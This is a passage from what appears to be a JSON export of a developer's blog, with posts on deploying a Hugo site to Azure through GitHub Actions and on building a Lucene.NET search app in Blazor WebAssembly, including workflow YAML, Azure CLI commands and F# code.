Hugo uses: peaceiris/actions-hugo@v2.3.0 with: hugo-version: "${{ steps.hugo-version.outputs.HUGO_VERSION }}" - name: Build run: hugo --minify --source ./src --destination ${{ env.OUTPUT_PATH }} The Setup Hugo Step uses our marketplace Action (peaceiris/actions-hugo@v2.3.0) and sets the version by looking back to the previous Step output. Then we run a build step using the hugo binary from the Action to generate the output files. 
Because my site content isn’t at the root of the repo, it’s in the src folder, I specify the --source flag and override the default output to use an environment variable created at the very top of the Workflow.\nCreating an Artifact A Job is made up of many Steps that are run sequentially, so you could do a build & release all from the one Job, but I prefer to separate those into clearly defined Jobs, making the phases of my Workflow clear. Since each Job runs on a new VM we need some way to get the artifacts that are generated out for use in future Jobs. For this we’ll use the actions/upload-artifact@v1 Action:\n1 2 3 4 5 6 7 8 9 10 11 - name: Publish website output uses: actions/upload-artifact@v1 with: name: website path: ${{ env.OUTPUT_PATH }} - name: Publish blog json uses: actions/upload-artifact@v1 with: name: json path: ${{ env.OUTPUT_PATH }}/index.json Again using the analogy to Azure Pipelines, this is like the PublishPipelineArtifact task, where we specify the name of the artifact and the location on disk to it. Artifacts are packaged as a zip for you, whether they are a single file or a directory, so you don’t need to do any archiving yourself unless you want something special, but then you’ll end up with it zipped anyway.\nYou may also notice that I’m publishing a JSON file, this is a JSON version of my blog which will be used to generate my search index.\nBut, as far as our static website is concerned, we can deploy it to Azure. You’ll find this full pipeline Job here on my GitHub\nBuilding Our Search App The other piece of the application we need to build is the Search App and the Search Index, which is a Blazor WebAssembly application and console application.\nFor this I’ll use two separate jobs, one to build the UI and one to build the index.\nBuilding the Blazor UI As this is a “Continious Integration” Job, like build_hugo, so it’ll start with git checkout, using the actions/checkout@v1 Action:\n1 2 3 4 build_search_ui: runs-on: ubuntu-latest steps: - uses: actions/checkout@v1 To build with .NET there’s a convenient actions/setup-dotnet Action that we can grab, and this one needs to know what version of .NET to download into your Job’s VM. I’m going to add a new environment variable to the top of our file (since we’ll use the same version in the build_search_index Job shortly):\n1 DOTNET_VERSION: "3.1.100-preview3-014645" Then it looks fairly similar to Azure Pipelines:\n1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 build_search_ui: runs-on: ubuntu-latest steps: - uses: actions/checkout@v1 - uses: actions/setup-dotnet@v1 with: dotnet-version: ${{ env.DOTNET_VERSION }} - name: Build search app run: dotnet build --configuration Release working-directory: ./Search - name: Publish search UI run: dotnet publish --no-build --configuration Release --output ${{ env.OUTPUT_PATH }} working-directory: ./Search/Search.Site.UI We have Steps to setup the version of .NET, run dotnet build and finally dotnet publish (of the UI) and then we can package up the outputs (which we learn about previously):\n1 2 3 4 5 - name: Package search UI uses: actions/upload-artifact@v1 with: name: search path: ${{ env.OUTPUT_PATH }}/Search.Site.UI/dist/_framework Blazor done (GitHub link), onto our search index.\nGenerating the Search Index This Job is going to be dependant on an artifact that comes from build_hugo so we need to tell GitHub Actions to wait for that one to complete. 
If we don’t, our Workflow will run all of our Jobs in parallel, for that we add a dependency list:\n1 2 3 4 5 6 7 8 9 build_search_index: runs-on: ubuntu-latest needs: build_hugo steps: - uses: actions/checkout@v1 - uses: actions/setup-dotnet@v1 with: dotnet-version: ${{ env.DOTNET_VERSION }} We’ll use the same actions/checkout and actions/setup-dotnet here, since we’re ultimately going to use dotnet run, but we’re going to need to get the JSON file to build the index from. For that we can use actions/download-artifact.\n1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 build_search_index: runs-on: ubuntu-latest needs: build_hugo steps: - uses: actions/checkout@v1 - uses: actions/setup-dotnet@v1 with: dotnet-version: ${{ env.DOTNET_VERSION }} - name: Download index source uses: actions/download-artifact@v1 with: name: json path: ${{ env.OUTPUT_PATH }} What’s cool about actions/download-artifact is that it will unpack the zip for you too, so the archiving format isn’t something you need to concern yourself about!\nNow we can build the index and publish it as an artifact:\n1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 build_search_index: runs-on: ubuntu-latest needs: build_hugo steps: - uses: actions/checkout@v1 - uses: actions/setup-dotnet@v1 with: dotnet-version: ${{ env.DOTNET_VERSION }} - name: Download index source uses: actions/download-artifact@v1 with: name: json path: ${{ env.OUTPUT_PATH }} - name: Build search index run: dotnet run working-directory: ./Search/Search.IndexBuilder - name: Publish search index uses: actions/upload-artifact@v1 with: name: search-index path: ./Search/Search.IndexBuilder/index.zip You will notice that I am uploading a zip as an artifact, so it will be “double archived”, but that is because the archive is what the UI application will download from my website, so it’s not a problem.\nAnd with that, the last of the Build Jobs are complete (GitHub link).\nDeploying to Azure Static Websites For my website I use Azure Static Websites as a cheap host. It turns out that there’s a GitHub Action already made for this, feeloor/azure-static-website-deploy which makes things super easy to deploy.\nThis prebuilt Action will deploy your files into the $web container within your Storage Account, as per the standard approach with Static Websites, but I don’t use the $web container directly, instead, I have my site in a subdirectory that uses the Azure Pipelines build number. This allows me to roll back versions if required, or when I break things, diff the changes. So instead of this Action I’m going to use the Azure CLI to do the deployment.\nLet’s start creating the Job:\n1 2 3 4 5 6 7 8 deploy_website: runs-on: ubuntu-latest needs: [build_search_ui, build_search_index] env: STORAGE_NAME: aaronpowellstaticwebsite CDN_NAME: aaronpowell CDN_PROFILE_NAME: aaronpowell RG_NAME: personal-website This is a “Continuous Delivery” Job so I’m prefixing it with deploy, it also has dependencies on the completion of the build_ jobs, which are defined in the needs property. I chose to not put build_hugo in the needs, since it’s enforced by the need to complete build_search_index, but I might change that in future so it’s a bit less opaque what the dependent Jobs are.\nI’ve also created some environment variables needed in Azure, mainly because I dislike inline magic strings. 
They are created within this Job rather than at the top of the Workflow since they are only used within this Job.\nNow it’s onto the Steps.\nWorking With Azure in Actions Microsoft has provided some Actions that you can use. At the time of writing there isn’t one for working with storage or CDN, we have to do that via the CLI, but before we can do that we need to log into Azure using azure/login:\n1 2 3 4 steps: - uses: azure/login@v1 with: creds: ${{ secrets.AZURE_CREDENTIALS }} To use this you need to create an Azure Service Principal and then store it as a secret variable for your Workflow (no, don’t inline your Azure credentials, that’s just bad).\nNext we need to download some artifacts using actions/download-artifact:\n1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 steps: - uses: azure/login@v1 with: creds: ${{ secrets.AZURE_CREDENTIALS }} - name: Download website uses: actions/download-artifact@v1 with: name: website path: ${{ env.OUTPUT_PATH }} - name: Download search UI uses: actions/download-artifact@v1 with: name: search path: ${{ env.OUTPUT_PATH }}/_framework - name: Download search index uses: actions/download-artifact@v1 with: name: search-index path: ${{ env.OUTPUT_PATH }} I’m being sneaky and downloading them all to the same folder, and since there aren’t any file name collisions my Job’s VM will have the website structure just how I want it!\nIt’s now time to upload the files to storage:\n1 2 - name: Deploy to Azure Storage run: az storage blob upload-batch --source ${{ env.OUTPUT_PATH }} --destination \\$web/${GITHUB_SHA} --account-name ${STORAGE_NAME} I’m using the upload-batch command on the CLI to do a bulk upload, which is faster than going through each file individually. When publishing using Azure Pipelines, the folder in the $web container was the build number, but with GitHub Actions there isn’t a build number, there’s only the SHA of the commit that triggered the action, which we can access using ${GITHUB_SHA}. This does mean I can’t sequentially find what is the latest deployment by browsing the storage account, but it is more obvious what commit relates to what deployment!\nFixing Our WASM App Update: Since I initially wrote this post the uploader has been improved to set the correct content type onf .wasm files, so you don’t need to do it manually. But if you have other files you need to change the content type for, this is how you’d do it.\nWhen you upload files to Azure Storage it will attempt to work out the mime type of the file and set it appropriately. Most of the time this works, except when it doesn’t, and WebAssembly seems to be one of those edge cases at the moment, .wasm files are given the mime type of application/octet-stream but it needs to be application/wasm, otherwise the browser will reject the file.\nBut that’s easily fixed with the Azure CLI!\n1 2 - name: Update wasm pieces run: az storage blob update --container-name \\$web/${GITHUB_SHA}/_framework/wasm --name "mono.wasm" --content-type "application/wasm" --account-name ${STORAGE_NAME} We can run a blob update and change the content-type stored so it gets served correctly.\nUpdating Azure CDN Latest website updates are uploaded, the files have the right types, so there’s one thing left to do, tell Azure CDN to start using the new updates.\nAgain, there isn’t an existing Action (at time of writing), so we’ll have to use the CLI. 
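Luckily the Azure CLI comes preinstalled on the hosted runners, and thanks to the azure/login Step earlier in the Job it's already authenticated. As an aside, if you haven't created the Service Principal that backs the AZURE_CREDENTIALS secret yet, the CLI can generate it (and the JSON blob to paste into the secret) with something along these lines - the name, subscription and resource group here are placeholders rather than my real values:

az ad sp create-for-rbac --name "blog-deploy" --role contributor --scopes /subscriptions/<subscription-id>/resourceGroups/<resource-group> --sdk-auth

The JSON it prints out is what azure/login expects in its creds input.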
The first step is to update the CDN endpoint to use the new folder:\n1 2 - name: Update CDN endpoint run: az cdn endpoint update --name ${CDN_NAME} --origin-path /${GITHUB_SHA} --profile-name ${CDN_PROFILE_NAME} --resource-group ${RG_NAME} And then we’ll purge the CDN cache so that the new files are sent to our readers:\n1 2 - name: Purge CDN run: az cdn endpoint purge --profile-name ${CDN_PROFILE_NAME} --name ${CDN_NAME} --resource-group ${RG_NAME} --content-paths "/*" Here we’re doing a hard-purge and just deleting everything from the cache, but if you were using it in other scenarios (or had some intelligence around what files were changes) you could set different content-paths and the purge would be quicker.\nBut that’s how we can deploy a static website and update the CDN from GitHub Actions (GitHub link).\nConclusion Throughout this post we’ve seen a bunch of different things with GitHub Actions. We’ve seen how to use some of the Actions provided by the Actions team to check out our source code and work with artifacts. We then used some third party Actions to work with Hugo and Azure.\nWe saw how to define variables that are available throughout a Workflow by putting them at the top of the Workflow, defined some for specific jobs (such as our Azure information), output them from one step to another in a Job or even have credentials made available.\nYou can see the complete Workflow YAML file on my GitHub and check out past runs such as from a recent blog post.\n", "id": "2019-12-17-implementing-github-actions-for-my-blog" }, { "title": "Optimising Our Blazor Search App", "url": "https://www.aaron-powell.com/posts/2019-12-11-optimising-our-blazor-search-app/", "date": "Wed, 11 Dec 2019 09:10:03 +1100", "tags": [ "wasm", "dotnet", "lucene.net", "fsharp" ], "description": "The load time for our Blazor + Lucene.NET app is a bit slow, let's look at how to optimise it.", "content": "When we build a search app using Blazor + Lucene.NET it did a good job of creating our search application but when you run it it’s kind of slow and that’s because we’re downloading the JSON representation of my blog and generating the Lucene.NET index each time. Then when we looked at hosting the Blazor app the main motivation was to use static files rather than getting Blazor to do heavy lifting to generate HTML every time.\nAfter talking to Dan Roth and Microsoft Ignite I got thinking, could we pre-generate the index and ship it down as a static resource somehow?\nLucene Index Primer If we’re going to ship the index to the browser rather than build it there we need to understand what the index is. Since Lucene aims to be as fast a search index as it can it uses a series of binary files to store the indexed data. If you look into a generated index you’ll find files such as _0.cfe or segments.gen. 
The numbered files are kind of like a database, containing the documents that were indexed and the tokens extracted from the fields, whereas the segments files create a map to where everything is stored.\nUltimately though, we’re going to have multiple files and the names of them are not deterministic as indexing and re-indexing can result in newly generated files or old ones not being cleaned up yet, depending on how well you flushed-on-write.\nSo we’re going to need to get creating.\nGenerating Our Index Before that though we need a way to repeatably generate the index, and to do that we’ll add a new project to our solution:\n1 2 dotnet new console --name Search.IndexBuilder dotnet sln add Search.IndexBuilder The IndexBuilder project is a console application that will replace much of the functionality that our WASM project had in building the index, so it’s going to need some NuGet packages:\n1 2 3 4 5 6 <ItemGroup> <PackageReference Include="Lucene.Net" Version="4.8.0-beta00006" /> <PackageReference Include="Lucene.Net.Analysis.Common" Version="4.8.0-beta00006" /> <PackageReference Include="System.Json" Version="4.7.0-preview3.19551.4" /> <PackageReference Include="FSharp.SystemTextJson" Version="0.6.2" /> </ItemGroup> This also means we can remove System.Json and FSharp.SystemTextJson from the Search.Site project (in time, once we’ve moved the code).\nInside the newly created Program.fs file we can start working on the index creation, first step is to get the JSON for my blog. Rather than downloading it from my website I’m traversing the disk to get it (since the Search App is in the same git repo):\n1 2 3 4 5 6 7 8 [<EntryPoint>] open System open System.IO let main argv = let searchText = File.ReadAllText <| Path.Combine(Environment.CurrentDirectory, "..", "..", ".output", "index.json") 0 Now to parse the JSON into our object model like before:\n1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 open System open System.IO open System.Text.Json open System.Text.Json.Serialization open Search open JsonExtensions let main argv = let searchText = File.ReadAllText <| Path.Combine(Environment.CurrentDirectory, "..", "..", ".output", "index.json") let options = JsonSerializerOptions() options.PropertyNameCaseInsensitive <- true options.Converters.Add(JsonFSharpConverter()) options.Converters.Add(InvalidDateTimeConverter()) let searchData = JsonSerializer.Deserialize<SearchData>(searchText, options) printfn "Got data from export, there are %d posts" searchData.posts.Length 0 Then we’ll finish off with cleaning up previous indexes, making a new one and generating a deployment package:\n1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 open System open System.IO open System.Text.Json open System.Text.Json.Serialization open Search open JsonExtensions open IndexTools open Packager [<EntryPoint>] let main argv = let baseDir = Environment.CurrentDirectory let searchText = File.ReadAllText <| Path.Combine(baseDir, "..", "..", ".output", "index.json") let options = JsonSerializerOptions() options.PropertyNameCaseInsensitive <- true options.Converters.Add(JsonFSharpConverter()) options.Converters.Add(InvalidDateTimeConverter()) let searchData = JsonSerializer.Deserialize<SearchData>(searchText, options) printfn "Got data from export, there are %d posts" searchData.posts.Length cleanupIndex baseDir |> makeIndex searchData |> packageIndex baseDir 0 The cleanupIndex function is a little function responsible for removing a previous index:\n1 2 3 4 5 6 7 let cleanupIndex baseDir = 
let indexPath = Path.Combine(baseDir, "lucene") if Directory.Exists indexPath then Directory.GetFiles indexPath |> Array.iter File.Delete Directory.Delete indexPath indexPath And the makeIndex function is the same as we had in the OnInitializedAsync function of our component, so I won’t inline it here (you can find it on GitHub).\nThat leaves us with one last function, packageIndex.\nPackaging the Index Remember in the previous post that we noticed that you can use System.IO in Blazor and there is a file system available to you (fun fact, it’s a Linux file system!)? Well that got me thinking since we’re able to write to it with Lucene.NET we should be able to write anything to it, and since we can use any netstandard library we could use an archive as the delivery mechanism!\nAnd that’s just what we’ll do, we’ll use System.IO.Compression.ZipFile:\n1 2 3 4 5 6 7 8 9 10 11 module Packager open System.IO open System.IO.Compression let packageIndex baseDir indexPath = let packagePath = Path.Combine(baseDir, "index.zip") if File.Exists packagePath then File.Delete packagePath ZipFile.CreateFromDirectory(indexPath, packagePath, CompressionLevel.Fastest, false) The packageIndex function will take in a starting directory and the path to the index, and put all those index files into a zip archive. Now we have a file that can be put on our server at a known location with a known file name for use in the component!\nUpdating the Component With the logic to build the index pushed off to a console application, we can now drastically simplify the component that we’ve created. First we’ll download the zip file as a stream and write it to disk:\n1 2 3 4 5 6 7 8 9 let downloadIndex() = task { let path = Path.Combine(Environment.CurrentDirectory, "index.zip") use! stream = http.GetStreamAsync("/index.zip") use file = File.Create path stream.CopyTo file return path } Note: This still uses the HttpClient injected via the Blazor Dependency Injection framework.\nSee how we’re able to use GetStreamAsync to stream the file and copy that stream to a FileStream? This is how you download a file in any .NET Core project, nothing special here even though it’s in WebAssembly.\nThen create another function to unpack the zip:\n1 let extractZip path = ZipFile.ExtractToDirectory(path, Environment.CurrentDirectory) Finally, the OnInitializedAsync can be updated:\n1 2 3 4 5 6 7 8 9 10 11 override this.OnInitializedAsync() = task { let! indexPath = downloadIndex() extractZip indexPath dir <- FSDirectory.Open(Environment.CurrentDirectory) reader <- DirectoryReader.Open dir this.IndexLoaded <- true } |> Task.Ignore Look at that, 25 lines down to 12, and since Lucene.NET is very efficient at opening indexes the application now only takes as long as it takes to download and extract the zip archive (we’re talking fractions of a second vs ten’s of seconds). You’ll find the fully updated component on GitHub.\nConclusion Like with the original experiment to run Lucene.NET in Blazor WebAssembly I was pretty amazed that this “just worked”, especially since it involves downloading a zip file, writing it “to disk” and then unpacking the archive. I remember early in my career that it was nearly impossible to do that on the server and now it’s less than 50 lines of code running in the browser!\nThat aside I think this is a nifty way to think about optimising Blazor applications. 
It’s very easy to forget that Blazor WASM is going to be running on every client that connects, so they are all going to be doing the heavy lifting, so if there’s an opportunity to offload some of that work and simplify what the client has to do, then it makes sense to do it.\nHere it was a case of generating a Lucene.NET index that we then download, but it could be any number of things that your application would normally “create on startup”.\nBut in the end it all “just works”, which you can see on my sites search feature and the full source code is in the Search folder on my blog’s GitHub repo.\n", "id": "2019-12-11-optimising-our-blazor-search-app" }, { "title": "Can You Use Blazor for Only Part of an App?", "url": "https://www.aaron-powell.com/posts/2019-12-10-can-you-use-blazor-for-only-part-of-an-app/", "date": "Tue, 10 Dec 2019 12:07:13 +1100", "tags": [ "wasm", "dotnet" ], "description": "Blazor is designed for whole-app dev, but what if you don't want it for that?", "content": "Blazor is designed to be a platform where you create a complete web application and we saw that in the last experiment with Blazor where we created a stand-alone search site for my blog. But like any tool in our toolbox, it isn’t always the right one for the job.\nTake my blog for example, it’s pretty much a read-only site with the content stored in GitHub as markdown that I use Hugo to convert into HTML files. Now sure, it’s possible to do it as a Blazor WASM application, we could get a .NET Markdown library could be used and the pages generated on-the-fly, but that’d an inefficient way to have my website run and would provide a sub-optimal experience to readers.\nBut if we want to integrate the search app that we’ve previously built, how do we go about that?\nUnderstanding How Blazor Starts To think about how we can run Blazor WebAssembly within another application we need to learn a bit about how a Blazor WebAssembly application runs.\nWhen you create a new project there’s a file called wwwroot/index.html that you might never have dug into, but this is an important piece of the puzzle. It looks like this:\n1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 <!DOCTYPE html> <html> <head> <meta charset="utf-8" /> <meta name="viewport" content="width=device-width" /> <title>Project Name</title> <base href="/" /> <link href="css/bootstrap/bootstrap.min.css" rel="stylesheet" /> <link href="css/site.css" rel="stylesheet" /> </head> <body> <app>Loading...</app> <script src="_framework/blazor.webassembly.js"></script> </body> </html> And really, it’s pretty simple, the important pieces that we need are these two lines:\n1 2 3 <app>Loading...</app> <script src="_framework/blazor.webassembly.js"></script> We’ll get to the <app> element shortly, but first, let’s take a look at the JavaScript file. You might notice that this file doesn’t appear anywhere on disk, and that’s because it’s part of the build output. You can find the source of this on GitHub in the ASP.NET Core repository at src/Components/Web.JS/src/Boot.WebAssembly.ts (at the time of writing anyway). 
This file shares some stuff in common with Blazor Server, but with the main difference of using the MonoPlatform which does a bunch of WASM interop.\nThis file is critical, without it your Blazor application won’t ever start up since it’s responsible for initializing the WASM environment that hosts Mono (by injecting a script into the DOM) and then it will use another generated file, _framework/blazor.boot.json, to work out what .NET DLL’s will need to be loaded into the Mono/WASM environment.\nSo you need to have this JS file included and the _framework folder needs to be at the root since that’s how it finds the JSON file (see this comment).\nLazy-Loading Blazor An interesting aside which I came across while digging in the source is that you can delay the load of Blazor by adding autostart="false" to the <script> tag, as per this line and then call window.Blazor.start() in JavaScript to start the Blazor application.\nI’m not going to use it for this integration, but it’s good to know that you can have a user-initiated initialisation, rather than on page load.\nPlacing Your Blazor App Now that we understand what makes our Blazor app start, how do we know where in the DOM it’ll appear? Well, that’s what the <app> element in our HTML is for, but how does Blazor know about it?\nIt turns out that that is something that we control from our Startup class:\n1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 using Microsoft.AspNetCore.Components.Builder; using Microsoft.Extensions.DependencyInjection; namespace DemoProject { public class Startup { public void ConfigureServices(IServiceCollection services) { } public void Configure(IComponentsApplicationBuilder app) { app.AddComponent<App>("app"); } } } See how on line 14 we’re using AddComponent and specifying a DOM selector of app? That’s how it knows what element in the DOM the application will start. This is something that you can change, maybe make it a selector to a ID of a DOM element or to a <div>, or to anything else that you want, but it’s not that important, so I just leave it as <app>.\nAside: I haven’t tried it yet, but given that you specify the DOM element and the entry component (via generics, this points to App.razor in the above sample) you could potentially have multiple independent Blazor apps running on a page. Why would you do this, I have no idea… but you can in theory!\nHosting Blazor When it comes to hosting Blazor WASM there are a few options but I want to focus on the Azure Storage static sites approach, which is how my blog is hosted.\nFirst thing we’ll need to do is publish the app in Release mode using dotnet publish --configuration Release. From that we’ll grab the contents of the bin/Release/{TARGET FRAMEWORK}/publish/{ASSEMBLY NAME}/dist/_framework folder, which will contain blazor.boot.json, blazor.server.js, blazor.webassembly.js, a folder called _bin and a folder called wasm.\nWe want to copy this _framework folder and place it in the root of our static site, maintaining all the paths so that Blazor can start up.\nNote: According to the docs you can change the content-root and path-base when hosting using dotnet run but I haven’t found them working when it’s published. 
Also, Hugo is very aggressive at setting absolute paths so I found it easiest to put my WASM files in the same structure that dotnet run used.\nSince this is a search application let’s create a new page called Search and put in our required HTML:\n1 2 3 <app></app> <script src="/_framework/blazor.webassembly.js"></script> Now generate your static site (or whatever host you’re using) and navigate to the /search router.\nIf everything has gone correctly you’ll have just received an error!\nSorry, there’s nothing at this address.\nBlazor Routing If you remember back to our last post we learnt about the @page directive in Razor Components. Here you specify the route that the page will match on and up until now we’ve had @page "/" there. But, we’re now on /search and Blazor’s routing engine has looked at the URL and executed your App.razor component:\n1 2 3 4 5 6 7 8 9 10 <Router AppAssembly="@typeof(Program).Assembly"> <Found Context="routeData"> <RouteView RouteData="@routeData" DefaultLayout="@typeof(MainLayout)" /> </Found> <NotFound> <LayoutView Layout="@typeof(MainLayout)"> <p>Sorry, there's nothing at this address.</p> </LayoutView> </NotFound> </Router> Since the Router didn’t find a matched route to use RouteView against it’s fallen through to NotFound and that is why we have this error!\nDon’t worry, it’s an easy fix, just update the @page directive to match the route that you want it to match on in your published site or simplify your App.razor to not care about routing.\nOnce a new publish is done and the files copied across it’ll be happy.\nConclusion Blazor is a great way which we can build rich applications, but there is value in generating static content upfront and using Blazor to enhance an application rather than own it.\nHere we’ve taken a bit of a look at the important files used to run a Blazor application within an HTML page and we’ve also looked at what it takes to drop it into some other kind of application.\n", "id": "2019-12-10-can-you-use-blazor-for-only-part-of-an-app" }, { "title": "Learn About Serverless Workflows on SSW.tv", "url": "https://www.aaron-powell.com/posts/2019-12-03-learn-about-serverless-workflows-on-sswtv/", "date": "Tue, 03 Dec 2019 13:32:15 +1100", "tags": [ "serverless", "fsharp" ], "description": "I sat down with SSW.tv to talk about how to create workflows using Durable Functions", "content": "At NDC Sydney I was invited by the SSW.tv team to sit down with Anthony Ison and chat about a topic that I’m really passionate about, using Durable Functions to create workflows.\nYou can check out the recording on YouTube, and my previous blog posts on the topic through my serverless tag.\n", "id": "2019-12-03-learn-about-serverless-workflows-on-sswtv" }, { "title": "Implementing Search in Blazor WebAssembly With Lucene.NET", "url": "https://www.aaron-powell.com/posts/2019-11-29-implementing-search-in-blazor-webassembly-with-lucenenet/", "date": "Fri, 29 Nov 2019 10:02:44 +1100", "tags": [ "wasm", "dotnet", "lucene.net", "fsharp" ], "description": "I recently added search to my website and decided to look at how to do it with Blazor, WASM and Lucene.NET", "content": "One of the main reasons I blog is to write stuff down that I have learnt so that in the future I can come back to it rather than having to keep it all in memory. The bonus is that others who come across the same problem can see how I’ve gone about solving it, so it’s a win-win. But when I converted my site to a static website it meant I had to sacrifice a piece of functionality, search. 
Now sure, we have pretty decent search engines out there in Google and Bing, which is what I tend to use, but I always thought that it’d be nice to integrate it back in someday.\nIn years gone by I’ve done work with Lucene.NET, particularly around its integration with Umbraco, and I’ve read Lucene in Action several times, so I was always thinking “wouldn’t it be cool to put Lucene on my site”. But Lucene is written in Java, Lucene.NET is… well… .NET and none of the JavaScript implementations are as feature complete as I’d like, so it was just something on the back burner… until now!\nBlazor After some conversations at a recent conference, I decided it was time to give Blazor another look. I’d played around with it in the past but nothing more than poking the Hello World demos, so I decided to try something a bit more complex.\nIf you’ve not come across Blazor before, Blazor is a tool for building web UI’s using C# and Razor and with the release of .NET 3.0 Blazor Server went GA. Blazor Server works by generating the HTML on the server and pushing it down to the browser using SignalR then handling all the JavaScript interop for you. You can wire up JavaScript events through C# and build a dynamic web application without writing a single line of JavaScript!\nWhile Blazor Server is cool I’m interested in the other style of Blazor, Blazor WebAssembly. The WebAssembly (WASM) version of Blazor is in preview at the time of writing and will need you to install the .NET Core 3.1 preview build (I’m using Preview 3). The difference from Blazor Server is that rather than running a server connection with SignalR and generating the HTML server-side we compile our .NET application down with a WASM version of the Mono runtime which is then run entirely in the browser. This is perfect for my static blog and I end up with something that’s just HTML, CSS and JavaScript… wait, actually it’s a bit of JavaScript, some WASM byte code and .NET DLLs!\nCreating Our Search App Let’s have a look at what it would take to make a search app using Lucene.NET as the engine. For the time being, we’ll create it separately from the static website but in a future post we’ll look to integrate it in.\nStep 1 - Creating Searchable Content We’re going to need some content to search from somewhere, and how you get that will depend on what kind of system you’re integrating with. Maybe you’ll be pulling some data from a database about products, maybe there’s a REST API to call or in my case, I have ~400 blog posts (and climbing!) 
that I want to index.\nThe easiest way for me to make this happen is to generate a machine-parsable version of my blog posts, which I’ll do in the form of JSON (I already have XML for my RSS feed, but parsing JSON is a lot easier in .NET) so Hugo needs to be updated to support that.\nFirst up, JSON needs to be added to Hugo’s output in the config.toml for the site:\n1 2 [outputs] home = [ "HTML", "RSS", "JSON"] Then we can create a layout to generate the JSON in your sites layout folder:\n{ "posts": [ {{ range $i, $e := where (.Data.Pages) ".Params.hidden" "!=" true }} {{- if and $i (gt $i 0) -}},{{- end }}{ "title": {{ .Title | jsonify }}, "url": "{{ .Permalink }}", "date": "{{ .Date.Format "Mon, 02 Jan 2006 15:04:05 -0700" | safeHTML }}", "tags": [{{ range $tindex, $tag := $e.Params.tags }}{{ if $tindex }}, {{ end }}"{{ $tag| htmlEscape }}"{{ end }}], "description": {{ .Description | jsonify }}, "content": {{$e.Plain | jsonify}} } {{ end }} ] } I found this template online and it iterates over all visible posts to create a JSON array that looks like this (my blog is ~2mb of JSON!):\n1 2 3 4 5 6 7 8 9 10 11 12 { "posts": [ { "title": "Combining React Hooks With AppInsights", "url": "https://www.aaron-powell.com/posts/2019-11-19-combining-react-hooks-with-appinsights/", "date": "Tue, 19 Nov 2019 11:40:02 +1100", "tags": ["react", "azure", "javascript"], "description": "A look at how to create a custom React Hook to work with AppInsights", "content": "<snip>" } ] } Step 2 - Setting Up Blazor As I mentioned above you’ll need to have .NET Core 3.1 SDK installed to use Blazor WebAssembly and I’m using Preview 3 (SDK 3.1.100-preview3-014645 to be specific).\nLet’s start by creating a solution and our Blazor project:\n1 2 3 4 5 dotnet new sln --name Search dotnet new blazorwasm --name Search.Site.UI dotnet sln add Search.Site.UI dotnet new classlib --name Search.Site --language F# dotnet sln add Search.Site The Blazor project, Search.Site.UI will contain just the .razor files and bootstrapping code, the rest of the logic will be pushed into a separate class library, Search.Site that I’m writing in F#.\nNote: There is a full F#-over-Blazor project called Bolero but it’s using an outdated version of Blazor. I’m also not a huge fan of F#-as-HTML like you get with Bolero, I prefer the Razor approach to binding so I’ll do a mixed-language solution.\nNow we can delete the Blazor sample site by removing everything from the Pages and Shared folder, since we’re going to create it all ourselves, with an empty default page called Index.razor:\n1 2 3 @page "/" <h1>TODO: Searching</h1> And a primitive MainLayout.razor (in the Shared folder):\n1 2 3 @inherits LayoutComponentBase @Body You might be wondering why the MainLayout.razor is so basic, the reason is that when it does come time to integrate it into our larger site we want the Blazor app to inject the minimal amount of HTML and styling, and instead use that from the hosting site, but for today we’ll get some of that from the wwwroot/index.html file.\nStep 3 - Starting Our Blazor UI Let’s build out the UI for search before we worry about the pesky backend. 
We’ll have the UI handle a few things, first it’ll show a message while the search index is being built (basically a loading screen), once the index is built it will present a search box and when a search is performed it’ll show the results.\nIn Blazor we use Components for pages (and for things we put on a page, but custom components are beyond the scope of what I’ll cover) and they can either have inline code like this:\n1 2 3 4 5 6 7 @page "/" <p>The time is: @Time.ToString("dd/MM/yyy hh:mm:ss")</p> @code { public DateTimeOffset Time => DateTimeOffset.Now; } Or they can inherit from a component class like this:\n1 2 3 4 @page "/" @inherits TimeComponent <p>The time is: @Time.ToString("dd/MM/yyy hh:mm:ss")</p> 1 2 3 public class TimeComponent : ComponentBase { public DateTimeOffset Time => DateTimeOffset.Now; } We’ll use the latter approach as I prefer to separate out processing logic so it could be testable, and also having a “code behind” gives me fond nostalgia to ASP.NET WebForms. 😉\nHere’s what our Component razor will look like:\n1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 @page "/" @if (!IndexLoaded) { <p>Just building the search index, one moment</p> } else { <form @onsubmit="Search"> <input type="search" @bind="SearchTerm" /><button type="submit">Search</button> </form> } @if (SearchResults.Count() > 0) { <ul> @foreach(var result in SearchResults) { <li> <p><a href="@result.Url" title="@result.Title" target="_blank">@result.Title (score: @result.Score.ToString("P2"))</a></p> <p>@result.Description</p> <p class="tags">Tags: @string.Join(" | ", result.Tags)</p> </li> } </ul> } else if (SearchResults.Count() == 0 && !string.IsNullOrEmpty(SearchTerm)) { <p>Nothing matched that query</p> } And let’s break down some of the interesting things, starting with the <form>.\n1 2 3 <form @onsubmit="Search"> <input type="search" @bind="SearchTerm" /><button type="submit">Search</button> </form> This form will submit the search but we don’t want it to go to a server, we want to wire it up to something within our WASM application, and to do that we bind the appropriate DOM event, which is onsubmit, and give it the name of a public method on our Component. We’ll also need to access the search term entered and for that we’ll use two-way data binding to a string property, via the @bind attribute, providing the name of the public property. 
